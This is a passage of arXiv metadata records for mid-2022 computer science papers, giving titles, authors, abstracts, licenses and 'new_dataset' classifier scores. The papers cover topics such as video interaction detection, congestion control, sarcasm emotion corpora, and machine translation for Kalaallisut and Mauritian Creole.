tubelet tokens, serving as highly abstracted spatiotemporal representations, for
video-based human-object interaction (V-HOI) detection. The tubelet tokens
structurize videos by agglomerating and linking semantically-related patch
tokens along spatial and temporal domains, which enjoy two benefits: 1)
Compactness: each tubelet token is learned by a selective attention mechanism
to reduce redundant spatial dependencies from others; 2) Expressiveness: each
tubelet token is enabled to align with a semantic instance, i.e., an object or
a human, across frames, thanks to agglomeration and linking. The effectiveness
and efficiency of TUTOR are verified by extensive experiments. Results show
that our method outperforms existing works by large margins, with a relative
mAP gain of $16.14\%$ on VidHOI and a 2-point gain on CAD-120, as well as a $4
\times$ speedup.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 04:27:59 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Tu",
"Danyang",
""
],
[
"Sun",
"Wei",
""
],
[
"Min",
"Xiongkuo",
""
],
[
"Zhai",
"Guangtao",
""
],
[
"Shen",
"Wei",
""
]
] |
new_dataset
| 0.973539 |
2206.01916
|
Gil Avraham
|
Gil Avraham, Julian Straub, Tianwei Shen, Tsun-Yi Yang, Hugo Germain,
Chris Sweeney, Vasileios Balntas, David Novotny, Daniel DeTone, Richard
Newcombe
|
Nerfels: Renderable Neural Codes for Improved Camera Pose Estimation
|
Published at CVPRW with supplementary material
| null | null | null |
cs.CV
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
This paper presents a framework that combines traditional keypoint-based
camera pose optimization with an invertible neural rendering mechanism. Our
proposed 3D scene representation, Nerfels, is locally dense yet globally
sparse. As opposed to existing invertible neural rendering systems which
overfit a model to the entire scene, we adopt a feature-driven approach for
representing scene-agnostic, local 3D patches with renderable codes. By
modelling a scene only where local features are detected, our framework
effectively generalizes to unseen local regions in the scene via an optimizable
code conditioning mechanism in the neural renderer, all while maintaining the
low memory footprint of a sparse 3D map representation. Our model can be
incorporated to existing state-of-the-art hand-crafted and learned local
feature pose estimators, yielding improved performance when evaluating on
ScanNet for wide camera baseline scenarios.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 06:29:46 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Avraham",
"Gil",
""
],
[
"Straub",
"Julian",
""
],
[
"Shen",
"Tianwei",
""
],
[
"Yang",
"Tsun-Yi",
""
],
[
"Germain",
"Hugo",
""
],
[
"Sweeney",
"Chris",
""
],
[
"Balntas",
"Vasileios",
""
],
[
"Novotny",
"David",
""
],
[
"DeTone",
"Daniel",
""
],
[
"Newcombe",
"Richard",
""
]
] |
new_dataset
| 0.999423 |
2206.01972
|
Jianing Bai
|
Jianing Bai, Tianhao Zhang, Guangming Xie
|
MACC: Cross-Layer Multi-Agent Congestion Control with Deep Reinforcement
Learning
|
7 pages, 8 figures
| null | null | null |
cs.NI cs.AI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Congestion Control (CC), the core networking task of efficiently utilizing
network capacity, has received great attention and is widely used in various
Internet communication applications such as 5G, the Internet-of-Things, UAN,
and more. Various CC algorithms have been proposed on both the network and
transport layers, such as the Active Queue Management (AQM) algorithm and the
Transmission Control Protocol (TCP) congestion control mechanism. However, it
is hard to model the dynamic AQM/TCP system and to make the two algorithms
cooperate to obtain excellent performance under different communication
scenarios. In this paper, we explore the performance of multi-agent
reinforcement learning-based cross-layer congestion control algorithms and
present the cooperation performance of two agents, known as MACC (Multi-agent
Congestion Control). We implement MACC in NS3. The simulation results show
that our scheme outperforms other congestion control combinations in terms of
throughput, delay, and other metrics. This not only proves that networking
protocols based on multi-agent deep reinforcement learning are efficient for
communication management, but also verifies that the networking area can serve
as a new playground for machine learning algorithms.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 12:02:35 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Bai",
"Jianing",
""
],
[
"Zhang",
"Tianhao",
""
],
[
"Xie",
"Guangming",
""
]
] |
new_dataset
| 0.988947 |
2206.01978
|
Rony Ginosar
|
Rony Ginosar and Amit Zoran
|
Inbetween: Visual Selection in Parametric Design
|
tool can be found at https://ronyginosar.github.io/parametricSpecimen
| null | null | null |
cs.HC
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
The act of selection plays a leading role in the design process and in the
definition of personal style. This work introduces visual selection catalogs
into parametric design environments. A two-fold contribution is presented: (i)
guidelines for construction of a minimal-bias visual selection catalog from a
parametric space, and (ii) Inbetween, a catalog for a parametric typeface that
adheres to the guidelines, allows for font selection from a continuous design
space, and enables the investigation of personal style. A user study conducted
among graphic designers revealed self-coherent characteristics in selection
patterns and a high correlation of selection patterns within tasks. These
findings suggest that such patterns reflect personal user styles, formalizing
the style selection process as traversals of decision trees. Together, our
guidelines and catalog aid in making visual selection a key building block in
the digital creation process and validate selection processes as a measure of
personal style.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 12:29:10 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ginosar",
"Rony",
""
],
[
"Zoran",
"Amit",
""
]
] |
new_dataset
| 0.993829 |
2206.01987
|
Anna Berdichevskaia
|
Anna Berdichevskaia (NUST "MISiS")
|
Atypical lexical abbreviations identification in Russian medical texts
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by-sa/4.0/
|
Abbreviation is a method of word formation that constructs a shortened term
from the first letters of the initial phrase. Implicit abbreviations
frequently cause comprehension difficulties for unprepared readers. In this
paper, we propose an efficient ML-based algorithm that identifies
abbreviations in Russian texts. The method achieves a ROC AUC score of 0.926
and an F1 score of 0.706, which are competitive in comparison with the
baselines. Along with the pipeline, we also establish the first, to our
knowledge, Russian dataset relevant to this task.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 13:16:08 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Berdichevskaia",
"Anna",
"",
"NUST \"MISiS\""
]
] |
new_dataset
| 0.995468 |
2206.02002
|
Sachin Mehta
|
Sachin Mehta and Farzad Abdolhosseini and Mohammad Rastegari
|
CVNets: High Performance Library for Computer Vision
|
Technical report
| null | null | null |
cs.CV cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We introduce CVNets, a high-performance open-source library for training deep
neural networks for visual recognition tasks, including classification,
detection, and segmentation. CVNets supports image and video understanding
tools, including data loading, data transformations, novel data sampling
methods, and implementations of several standard networks with similar or
better performance than previous studies.
Our source code is available at: \url{https://github.com/apple/ml-cvnets}.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 14:55:24 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Mehta",
"Sachin",
""
],
[
"Abdolhosseini",
"Farzad",
""
],
[
"Rastegari",
"Mohammad",
""
]
] |
new_dataset
| 0.999606 |
2206.02015
|
Zhan Xu
|
Zhan Xu, Matthew Fisher, Yang Zhou, Deepali Aneja, Rushikesh Dudhat,
Li Yi, Evangelos Kalogerakis
|
APES: Articulated Part Extraction from Sprite Sheets
| null | null | null | null |
cs.CV cs.GR
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Rigged puppets are one of the most prevalent representations to create 2D
character animations. Creating these puppets requires partitioning characters
into independently moving parts. In this work, we present a method to
automatically identify such articulated parts from a small set of character
poses shown in a sprite sheet, which is an illustration of the character that
artists often draw before puppet creation. Our method is trained to infer
articulated parts, e.g. head, torso and limbs, that can be re-assembled to best
reconstruct the given poses. Our results demonstrate significantly better
performance than alternatives, both qualitatively and quantitatively. Our
project page https://zhan-xu.github.io/parts/ includes our code and data.
|
[
{
"version": "v1",
"created": "Sat, 4 Jun 2022 15:44:04 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Xu",
"Zhan",
""
],
[
"Fisher",
"Matthew",
""
],
[
"Zhou",
"Yang",
""
],
[
"Aneja",
"Deepali",
""
],
[
"Dudhat",
"Rushikesh",
""
],
[
"Yi",
"Li",
""
],
[
"Kalogerakis",
"Evangelos",
""
]
] |
new_dataset
| 0.995469 |
2206.02093
|
Jinchuan Tian
|
Jinchuan Tian, Jianwei Yu, Chunlei Zhang, Chao Weng, Yuexian Zou, Dong
Yu
|
LAE: Language-Aware Encoder for Monolingual and Multilingual ASR
| null | null | null | null |
cs.CL cs.AI
|
http://creativecommons.org/licenses/by-nc-nd/4.0/
|
Despite the rapid progress in automatic speech recognition (ASR) research,
recognizing multilingual speech using a unified ASR system remains highly
challenging. Previous works on multilingual speech recognition mainly focus on
two directions: recognizing multiple monolingual speech or recognizing
code-switched speech that uses different languages interchangeably within a
single utterance. However, a pragmatic multilingual recognizer is expected to
be compatible with both directions. In this work, a novel language-aware
encoder (LAE) architecture is proposed to handle both situations by
disentangling language-specific information and generating frame-level
language-aware representations during encoding. In the LAE, the primary
encoding is implemented by the shared block while the language-specific blocks
are used to extract specific representations for each language. To learn
language-specific information discriminatively, a language-aware training
method is proposed to optimize the language-specific blocks in LAE. Experiments
conducted on Mandarin-English code-switched speech suggest that the proposed
LAE is capable of discriminating between languages at the frame level and
shows superior performance on both monolingual and multilingual ASR tasks.
With either a real-recorded or simulated code-switched dataset, the proposed
LAE achieves statistically significant improvements on both CTC and neural
transducer systems. Code is released.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 04:03:12 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Tian",
"Jinchuan",
""
],
[
"Yu",
"Jianwei",
""
],
[
"Zhang",
"Chunlei",
""
],
[
"Weng",
"Chao",
""
],
[
"Zou",
"Yuexian",
""
],
[
"Yu",
"Dong",
""
]
] |
new_dataset
| 0.996922 |
2206.02100
|
Divya Raghunathan
|
Divya Raghunathan, Ryan Beckett, Aarti Gupta, David Walker
|
ACORN: Network Control Plane Abstraction using Route Nondeterminism
|
23 pages, 10 figures
| null | null | null |
cs.NI
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Networks are hard to configure correctly, and misconfigurations occur
frequently, leading to outages or security breaches. Formal verification
techniques have been applied to guarantee the correctness of network
configurations, thereby improving network reliability. This work addresses
verification of distributed network control planes, with two distinct
contributions to improve the scalability of formal verification. Our first
contribution is a hierarchy of abstractions of varying precision which
introduce nondeterminism into the route selection procedure that routers use to
select the best available route. We prove the soundness of these abstractions
and show their benefits. Our second contribution is a novel SMT encoding which
uses symbolic graphs to encode all possible stable routing trees that are
compliant with the given network control plane configurations. We have
implemented our abstractions and SMT encodings in a prototype tool called
ACORN. Our evaluations show that our abstractions can provide significant
relative speedups (up to 323x) in performance, and ACORN can scale up to
$\approx37,000$ routers (organized in FatTree topologies, with synthesized
shortest-path routing and valley-free policies) for verifying reachability.
This far exceeds the performance of existing tools for control plane
verification.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 05:29:26 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Raghunathan",
"Divya",
""
],
[
"Beckett",
"Ryan",
""
],
[
"Gupta",
"Aarti",
""
],
[
"Walker",
"David",
""
]
] |
new_dataset
| 0.999467 |
2206.02119
|
Apoorva Nunna
|
Anupama Ray, Shubham Mishra, Apoorva Nunna, Pushpak Bhattacharyya
|
A Multimodal Corpus for Emotion Recognition in Sarcasm
| null | null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
While sentiment and emotion analysis have been studied extensively, the
relationship between sarcasm and emotion has largely remained unexplored. A
sarcastic expression may have a variety of underlying emotions. For example, "I
love being ignored" belies sadness, while "my mobile is fabulous with a battery
backup of only 15 minutes!" expresses frustration. Detecting the emotion behind
a sarcastic expression is non-trivial yet an important task. We undertake the
task of detecting the emotion in a sarcastic statement, which to the best of
our knowledge, is hitherto unexplored. We start with the recently released
multimodal sarcasm detection dataset (MUStARD) pre-annotated with 9 emotions.
We identify and correct 343 incorrect emotion labels (out of 690). We double
the size of the dataset, label it with emotions along with valence and arousal
which are important indicators of emotional intensity. Finally, we label each
sarcastic utterance with one of four sarcasm types (Propositional, Embedded,
Like-prefixed, and Illocutionary), with the goal of advancing sarcasm
detection research. Exhaustive experimentation with multimodal (text, audio,
and video) fusion models establishes a benchmark for exact emotion recognition
in sarcasm and outperforms state-of-the-art sarcasm detection. We release the dataset
enriched with various annotations and the code for research purposes:
https://github.com/apoorva-nunna/MUStARD_Plus_Plus
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:01:09 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Ray",
"Anupama",
""
],
[
"Mishra",
"Shubham",
""
],
[
"Nunna",
"Apoorva",
""
],
[
"Bhattacharyya",
"Pushpak",
""
]
] |
new_dataset
| 0.995066 |
2206.02120
|
Ao Wang
|
Ao Wang, Wei Li, Xin Wu, Zhanchao Huang, and Ran Tao
|
MPANet: Multi-Patch Attention For Infrared Small Target object Detection
|
4 pages 3 figures
|
2022IGARSS
| null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Infrared small target detection (ISTD) has attracted widespread attention and
been applied in various fields. Due to the small size of infrared targets and
the noise interference from complex backgrounds, the performance of ISTD using
convolutional neural networks (CNNs) is restricted. Moreover, the constraint
that long-distance dependent features cannot be encoded by vanilla CNNs also
impairs the robustness of capturing targets' shapes and locations in complex
scenarios. To this end, a multi-patch attention network (MPANet) based on an
axial-attention encoder and a multi-scale patch branch (MSPB) structure is
proposed. Specifically, an axial-attention-improved encoder architecture is
designed to highlight the effective features of small targets and suppress
background noise. Furthermore, the developed MSPB structure fuses
coarse-grained and fine-grained features from different semantic scales.
Extensive experiments on the SIRST dataset show the superior performance and
effectiveness of the proposed MPANet compared to state-of-the-art methods.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:01:38 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Ao",
""
],
[
"Li",
"Wei",
""
],
[
"Wu",
"Xin",
""
],
[
"Huang",
"Zhanchao",
""
],
[
"Tao",
"Ran",
""
]
] |
new_dataset
| 0.999701 |
2206.02127
|
Xinyu Hu
|
Xinyu Hu, Tanmay Binaykiya, Eric Frank, Olcay Cirit
|
DeeprETA: An ETA Post-processing System at Scale
| null | null | null | null |
cs.LG
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Estimated Time of Arrival (ETA) plays an important role in delivery and
ride-hailing platforms. For example, Uber uses ETAs to calculate fares,
estimate pickup times, match riders to drivers, plan deliveries, and more.
Commonly used route planning algorithms predict an ETA conditioned on the best
available route, but such ETA estimates can be unreliable when the actual route
taken is not known in advance. In this paper, we describe an ETA
post-processing system in which a deep residual ETA network (DeeprETA) refines
naive ETAs produced by a route planning algorithm. Offline experiments and
online tests demonstrate that post-processing by DeeprETA significantly
improves upon the accuracy of naive ETAs as measured by mean and median
absolute error. We further show that post-processing by DeeprETA attains lower
error than competitive baseline regression models.
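The post-processing idea can be sketched with a linear stand-in for the
residual network (ours; DeeprETA itself is a deep model and these synthetic
numbers are purely illustrative): fit a correction on top of the naive ETA so
that the refined estimate is naive plus a learned residual.

import numpy as np

rng = np.random.default_rng(0)
naive = rng.uniform(5, 60, size=1000)                    # naive route-engine ETAs (minutes)
extra = rng.uniform(0, 1, size=1000)                     # one extra context feature
actual = 1.1 * naive + 3.0 * extra + rng.normal(0, 1, 1000)

X = np.column_stack([naive, extra, np.ones_like(naive)])
w, *_ = np.linalg.lstsq(X, actual - naive, rcond=None)   # fit the residual target
refined = naive + X @ w
print(np.mean(np.abs(actual - naive)))                   # error of the naive ETA
print(np.mean(np.abs(actual - refined)))                 # error after post-processing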
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 08:51:49 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hu",
"Xinyu",
""
],
[
"Binaykiya",
"Tanmay",
""
],
[
"Frank",
"Eric",
""
],
[
"Cirit",
"Olcay",
""
]
] |
new_dataset
| 0.989185 |
2206.02187
|
Pankaj Wasnik
|
Vishal Chudasama, Purbayan Kar, Ashish Gudmalwar, Nirmesh Shah, Pankaj
Wasnik, Naoyuki Onoe
|
M2FNet: Multi-modal Fusion Network for Emotion Recognition in
Conversation
|
Accepted for publication in the 5th Multimodal Learning and
Applications (MULA) Workshop at CVPR 2022
| null | null | null |
cs.CV cs.SD eess.AS
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Emotion Recognition in Conversations (ERC) is crucial in developing
sympathetic human-machine interaction. In conversational videos, emotion can be
present in multiple modalities, i.e., audio, video, and transcript. However,
due to the inherent characteristics of these modalities, multi-modal ERC has
always been considered a challenging undertaking. Existing ERC research focuses
mainly on using text information in a discussion, ignoring the other two
modalities. We anticipate that emotion recognition accuracy can be improved by
employing a multi-modal approach. Thus, in this study, we propose a Multi-modal
Fusion Network (M2FNet) that extracts emotion-relevant features from visual,
audio, and text modality. It employs a multi-head attention-based fusion
mechanism to combine emotion-rich latent representations of the input data. We
introduce a new feature extractor to extract latent features from the audio and
visual modality. The proposed feature extractor is trained with a novel
adaptive margin-based triplet loss function to learn emotion-relevant features
from the audio and visual data. In the domain of ERC, the existing methods
perform well on one benchmark dataset but not on others. Our results show that
the proposed M2FNet architecture outperforms all other methods in terms of
weighted average F1 score on well-known MELD and IEMOCAP datasets and sets a
new state-of-the-art performance in ERC.
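As a hedged sketch of the margin-based component (ours; the paper's exact
adaptive-margin schedule is not reproduced here), a triplet loss pulls
same-emotion embeddings together and pushes different-emotion embeddings
apart, with the margin treated as an adjustable quantity rather than a fixed
constant.

import torch
import torch.nn.functional as F

def triplet_loss(anchor, positive, negative, margin):
    d_ap = F.pairwise_distance(anchor, positive)
    d_an = F.pairwise_distance(anchor, negative)
    return F.relu(d_ap - d_an + margin).mean()

anchor, positive, negative = (torch.randn(8, 128) for _ in range(3))
for step, margin in enumerate([0.2, 0.5, 1.0]):   # stand-in "adaptive" schedule
    print(step, float(triplet_loss(anchor, positive, negative, margin)))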
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 14:18:58 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Chudasama",
"Vishal",
""
],
[
"Kar",
"Purbayan",
""
],
[
"Gudmalwar",
"Ashish",
""
],
[
"Shah",
"Nirmesh",
""
],
[
"Wasnik",
"Pankaj",
""
],
[
"Onoe",
"Naoyuki",
""
]
] |
new_dataset
| 0.967528 |
2206.02230
|
Alexander Jones
|
Alex Jones
|
Finetuning a Kalaallisut-English machine translation system using
web-crawled data
| null | null | null | null |
cs.CL cs.AI
|
http://creativecommons.org/licenses/by-sa/4.0/
|
West Greenlandic, known by native speakers as Kalaallisut, is an extremely
low-resource polysynthetic language spoken by around 56,000 people in
Greenland. Here, we attempt to finetune a pretrained Kalaallisut-to-English
neural machine translation (NMT) system using web-crawled pseudoparallel
sentences from around 30 multilingual websites. We compile a corpus of over
93,000 Kalaallisut sentences and over 140,000 Danish sentences, then use
cross-lingual sentence embeddings and approximate nearest-neighbors search in
an attempt to mine near-translations from these corpora. Finally, we translate
the Danish sentences to English to obtain a synthetic Kalaallisut-English
aligned corpus. Although the resulting dataset is too small and noisy to
improve the pretrained MT model, we believe that with additional resources, we
could construct a better pseudoparallel corpus and achieve more promising
results on MT. We also note other possible uses of the monolingual Kalaallisut
data and discuss directions for future work. We make the code and data for our
experiments publicly available.
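A minimal sketch of the mining step (ours, with random vectors standing in for
cross-lingual sentence embeddings and a made-up threshold): each source
sentence is paired with its nearest neighbor by cosine similarity, and
low-similarity pairs are discarded.

import numpy as np

rng = np.random.default_rng(0)
src = rng.normal(size=(5, 16))    # stand-in Kalaallisut sentence embeddings
tgt = rng.normal(size=(7, 16))    # stand-in Danish sentence embeddings
src /= np.linalg.norm(src, axis=1, keepdims=True)
tgt /= np.linalg.norm(tgt, axis=1, keepdims=True)

sims = src @ tgt.T                # cosine similarities
best = sims.argmax(axis=1)        # nearest neighbor per source sentence
pairs = [(i, int(j)) for i, j in enumerate(best) if sims[i, j] > 0.3]
print(pairs)                      # candidate near-translations to keep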
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 17:56:55 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Jones",
"Alex",
""
]
] |
new_dataset
| 0.999708 |
2206.02281
|
Zhenyu Wu
|
Zhenyu Hu, Zhenyu Wu, Pengcheng Pi, Yunhe Xue, Jiayi Shen, Jianchao
Tan, Xiangru Lian, Zhangyang Wang, and Ji Liu
|
E^2VTS: Energy-Efficient Video Text Spotting from Unmanned Aerial
Vehicles
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
Unmanned Aerial Vehicles (UAVs) based video text spotting has been
extensively used in civil and military domains. UAV's limited battery capacity
motivates us to develop an energy-efficient video text spotting solution. In
this paper, we first revisit RCNN's crop & resize training strategy and
empirically find that it outperforms aligned RoI sampling on a real-world video
text dataset captured by UAV. To reduce energy consumption, we further propose
a multi-stage image processor that takes videos' redundancy, continuity, and
mixed degradation into account. Lastly, the model is pruned and quantized
before being deployed on a Raspberry Pi. Our proposed energy-efficient video
text spotting solution, dubbed E^2VTS, outperforms all previous methods by
achieving a competitive tradeoff between energy efficiency and performance. All
our codes and pre-trained models are available at
https://github.com/wuzhenyusjtu/LPCVC20-VideoTextSpotting.
|
[
{
"version": "v1",
"created": "Sun, 5 Jun 2022 22:43:17 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Hu",
"Zhenyu",
""
],
[
"Wu",
"Zhenyu",
""
],
[
"Pi",
"Pengcheng",
""
],
[
"Xue",
"Yunhe",
""
],
[
"Shen",
"Jiayi",
""
],
[
"Tan",
"Jianchao",
""
],
[
"Lian",
"Xiangru",
""
],
[
"Wang",
"Zhangyang",
""
],
[
"Liu",
"Ji",
""
]
] |
new_dataset
| 0.995971 |
2206.02314
|
Yixin Wang
|
Yixin Wang and Tingting Zhu and Xiao Ma
|
Transmission of Bernoulli Sources Using Convolutional LDGM Codes
|
24 pages, 13 figures
| null | null | null |
cs.IT math.IT
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
In this paper, we propose to exploit convolutional low-density generator
matrix (LDGM) codes for the transmission of Bernoulli sources over binary-input
output-symmetric (BIOS) channels. To this end, we present a new framework to
prove the coding theorems for linear codes, which unifies the channel coding
theorem, the source coding theorem and the joint source-channel coding (JSCC)
theorem. In the presented framework, the systematic bits and the corresponding
parity-check bits play different roles. Precisely, the noisy systematic bits
are used to limit the list size of typical codewords, while the noisy
parity-check bits are used to select from the list the maximum likelihood
codeword. This new framework for linear codes allows that the systematic bits
and the parity-check bits are transmitted in different ways and over different
channels. With this framework, we prove that the Bernoulli generator matrix
codes (BGMCs) are capacity-achieving over BIOS channels, entropy-achieving for
Bernoulli sources, and also system-capacity-achieving for JSCC applications. A
lower bound on the bit-error rate (BER) is derived for linear codes, which can
be used to predict the error floors and hence serves as a simple tool to design
the JSCC system. Numerical results show that the convolutional LDGM codes
perform well in the waterfall region and match well with the derived error
floors, which can be lowered down if required by simply increasing the encoding
memory.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 02:15:56 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Wang",
"Yixin",
""
],
[
"Zhu",
"Tingting",
""
],
[
"Ma",
"Xiao",
""
]
] |
new_dataset
| 0.968103 |
2206.02366
|
Alexandr Notchenko
|
Alexandr Notchenko, Vladislav Ishimtsev, Alexey Artemov, Vadim
Selyutin, Emil Bogomolov, Evgeny Burnaev
|
Scan2Part: Fine-grained and Hierarchical Part-level Understanding of
Real-World 3D Scans
|
In Proceedings of the 17th International Joint Conference on Computer
Vision, Imaging and Computer Graphics Theory and Applications
| null |
10.5220/0010848200003124
| null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
We propose Scan2Part, a method to segment individual parts of objects in
real-world, noisy indoor RGB-D scans. To this end, we vary the part hierarchies
of objects in indoor scenes and explore their effect on scene understanding
models. Specifically, we use a sparse U-Net-based architecture that captures
the fine-scale detail of the underlying 3D scan geometry by leveraging a
multi-scale feature hierarchy. In order to train our method, we introduce the
Scan2Part dataset, which is the first large-scale collection providing detailed
semantic labels at the part level in the real-world setting. In total, we
provide 242,081 correspondences between 53,618 PartNet parts of 2,477 ShapeNet
objects and 1,506 ScanNet scenes, at two spatial resolutions of 2 cm$^3$ and 5
cm$^3$. As output, we are able to predict fine-grained per-object part labels,
even when the geometry is coarse or partially missing.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 05:43:10 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Notchenko",
"Alexandr",
""
],
[
"Ishimtsev",
"Vladislav",
""
],
[
"Artemov",
"Alexey",
""
],
[
"Selyutin",
"Vadim",
""
],
[
"Bogomolov",
"Emil",
""
],
[
"Burnaev",
"Evgeny",
""
]
] |
new_dataset
| 0.979616 |
2206.02373
|
Bharath Comandur
|
Bharath Comandur
|
Sports Re-ID: Improving Re-Identification Of Players In Broadcast Videos
Of Team Sports
| null | null | null | null |
cs.CV
|
http://arxiv.org/licenses/nonexclusive-distrib/1.0/
|
This work focuses on player re-identification in broadcast videos of team
sports. Specifically, we focus on identifying the same player in images
captured from different camera viewpoints during any given moment of a match.
This task differs from traditional applications of person re-id in a few
important ways. Firstly, players from the same team wear highly similar
clothes, thereby making it harder to tell them apart. Secondly, there are only
a small number of samples for each identity, which makes it harder to train a
re-id system. Thirdly, the resolutions of the images are often quite low and
vary a lot. This, combined with heavy occlusions and fast movements of
players, greatly increases the challenges for re-id. In this paper, we propose a simple
but effective hierarchical data sampling procedure and a centroid loss function
that, when used together, increase the mean average precision (mAP) by 7 - 11.5
and the rank-1 (R1) by 8.8 - 14.9 without any change in the network or
hyper-parameters used. Our data sampling procedure improves the similarity of
the training and test distributions, and thereby aids in creating better
estimates of the centroids of the embeddings (or feature vectors).
Surprisingly, our study shows that in the presence of severely limited data, as
is the case for our application, a simple centroid loss function based on
euclidean distances significantly outperforms the popular triplet-centroid loss
function. We show comparable improvements for both convolutional networks and
vision transformers. Our approach is among the top ranked methods in the
SoccerNet Re-Identification Challenge 2022 leaderboard (test-split) with a mAP
of 86.0 and a R1 of 81.5. On the sequestered challenge split, we achieve an mAP
of 84.9 and a R1 of 80.1. Research on re-id for sports-related applications is
very limited, and our work presents one of the first discussions of this topic
in the literature.
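A minimal sketch of the euclidean centroid loss favored here (ours; the actual
training also uses the hierarchical sampling described above) pulls each
embedding toward the centroid of its identity.

import torch

def centroid_loss(embeddings, labels):
    classes = labels.unique()
    loss = 0.0
    for c in classes:
        members = embeddings[labels == c]
        centroid = members.mean(dim=0, keepdim=True)
        loss = loss + ((members - centroid) ** 2).sum(dim=1).sqrt().mean()
    return loss / len(classes)

embeddings = torch.randn(12, 64)
labels = torch.tensor([0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3])
print(float(centroid_loss(embeddings, labels)))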
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 06:06:23 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Comandur",
"Bharath",
""
]
] |
new_dataset
| 0.954467 |
2206.02396
|
Vahideh Keikha
|
Vahideh Keikha
|
Large $k$-gons in a 1.5D Terrain
| null | null | null | null |
cs.CG
|
http://creativecommons.org/licenses/by/4.0/
|
Given is a 1.5D terrain $\mathcal{T}$, i.e., an $x$-monotone polygonal chain
in $\mathbb{R}^2$. For a given $2\le k\le n$, our objective is to approximate
the largest area or perimeter convex polygon of exactly or at most $k$ vertices
inside $\mathcal{T}$. For a constant $k>3$, we design an FPTAS that efficiently
approximates the largest convex polygons with at most $k$ vertices, within a
factor $(1-\epsilon)$. For the case where $k=2$, we design an $O(n)$ time exact
algorithm for computing the longest line segment in $\mathcal{T}$, and for
$k=3$, we design an $O(n \log n)$ time exact algorithm for computing the
largest-perimeter triangle that lies within $\mathcal{T}$.
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 07:09:19 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Keikha",
"Vahideh",
""
]
] |
new_dataset
| 0.960584 |
2206.02421
|
Prasanna Raj Noel Dabre
|
Raj Dabre, Aneerav Sukhoo
|
MorisienMT: A Dataset for Mauritian Creole Machine Translation
|
Work in progress! (obviously) Dataset is here:
https://huggingface.co/datasets/prajdabre/MorisienMT
| null | null | null |
cs.CL
|
http://creativecommons.org/licenses/by/4.0/
|
In this paper, we describe MorisienMT, a dataset for benchmarking machine
translation quality of Mauritian Creole. Mauritian Creole (Morisien) is the
lingua franca of the Republic of Mauritius and is a French-based creole
language. MorisienMT consists of a parallel corpus between English and
Morisien, French and Morisien and a monolingual corpus for Morisien. We first
give an overview of Morisien and then describe the steps taken to create the
corpora and, from it, the training and evaluation splits. Thereafter, we
establish a variety of baseline models using the created parallel corpora as
well as large French--English corpora for transfer learning. We release our
datasets publicly for research purposes and hope that this spurs research on
Morisien machine translation.
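A minimal sketch of loading the released data, assuming the Hugging Face Hub id given in the comments field; the config and split names are not stated in the abstract and may differ from the actual dataset card.

```python
# Sketch: loading MorisienMT from the Hugging Face Hub.
# The repository id comes from this record's comments field; whether a
# config name is required is an assumption to verify on the dataset card.
from datasets import load_dataset

ds = load_dataset("prajdabre/MorisienMT")  # may require a config name argument
split = next(iter(ds))                     # first available split
for example in ds[split].select(range(3)):
    print(example)                         # inspect parallel text columns
```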
|
[
{
"version": "v1",
"created": "Mon, 6 Jun 2022 08:30:03 GMT"
}
] | 2022-06-07T00:00:00 |
[
[
"Dabre",
"Raj",
""
],
[
"Sukhoo",
"Aneerav",
""
]
] |
new_dataset
| 0.999749 |
2206.02562
|
Dominik Raabe
|
Dominik Raabe, Henrik Biermann, Manuel Bassek, Martin Wohlan, Rumena
Komitova, Robert Rein, Tobias Kuppens Groot, Daniel Memmert
|
floodlight -- A high-level, data-driven sports analytics framework
|
5 pages, 1 figure. For associated package, see
https://pypi.org/project/floodlight/. For source code, see
https://github.com/floodlight-sports/floodlight . For documentation, see
